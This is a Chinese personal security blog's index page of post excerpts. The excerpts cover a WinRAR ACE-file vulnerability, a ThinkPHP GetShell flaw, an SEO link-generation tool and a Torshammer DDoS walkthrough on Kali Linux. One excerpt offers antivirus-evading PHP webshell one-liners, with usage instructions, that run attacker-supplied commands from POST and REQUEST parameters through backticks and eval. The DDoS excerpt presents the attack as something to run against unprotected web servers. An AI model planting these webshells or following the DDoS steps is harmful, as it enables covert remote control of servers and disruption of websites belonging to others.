jasonx's Blog

jasonx 2019/02/22 1649 0

0x01 漏洞描述近日Check Point团队爆出了一个关于WinRAR存在19年的漏洞，用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件，当受害者使用WinRAR解压该恶意文件时便会触发漏洞。该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的，没有任何的基础保护机制(ASLR, DEP 等)。动态链接库的作用是处理 ACE 格式文件。而WinRAR解压ACE文件时，由...

jasonx 2019/01/20 1435 0

请输入密码访问

jasonx 2019/01/18 1433 0

用途可检查硬盘是否4K对齐。测试硬盘读写数据等等。下载地址AS SSD Benchmark.rar

jasonx 2019/01/15 1393 0

免杀命令执行食用方法：/shell.php post:c=dir1：<?php $c=1;$a=$_POST;extract($a);print_r(`$c`); ?> 2：<?php echo `$_=$_REQUEST[c]`; ?> 免杀webshell1：<?php $a=call_user_func(function($u){return @$_REQUEST[$u];},'1'); eva...

jasonx 2019/01/12 2801 0

前言ThinkPHP是一个免费开源的，快速、简单的面向对象的轻量级PHP开发框架，是为了敏捷WEB应用开发和简化企 业应用开发而诞生的。由于其简单易用，国内用户众多。2019年1月11日ThinkPHP团队发布了版本更新，本次更新包含了一个可能GetShell的安全更新，具体内容为改进Request类的method方法。漏洞描述Thinphp团队在实现框架中的核心类Requests的method方法实现了表单请求类型伪装，默认为$...

jasonx 2019/01/11 1835 0

更新说明2.7 解决部分关键词乱码问题2.6 添加了敏感关键词检测及删除功能2.5 修正了随机关键词顺序会重复的问题。关键词SEO工具SEO工具箱SEO超链接生成工具SEO超链接生成软件作用本软件可以让关键词自动生成超链接，适合网站做SEO使用。用法在程序目录下，把挖到的关键词一行一个放进去，注意不要有空行。然后打开软件，设置好你要生成的数量，超链接URL和随机的网页ID值。点击生成就可以得到代码，复制到你网站上，黏贴就行了。软件...

jasonx 2019/01/10 1493 2

用的方法很少，声称DDoS或任何类型的网络丢失都是成功的。让我们看一下执行DDoS攻击的方法之一。这种攻击非常强大，并且需要您应该知道如何在Kali Linux操作系统上操作命令的唯一技能。首先，如果你想检查任何网站都有它的TCP端口80开启与否，你可以去nmap和给定的所有教程NMAP。我们使用的这个工具是Torshammer。它是用Python编写的，可以在实例中对未受保护的Web服务器造成损害，这就是为什么它是一个缓慢的后期...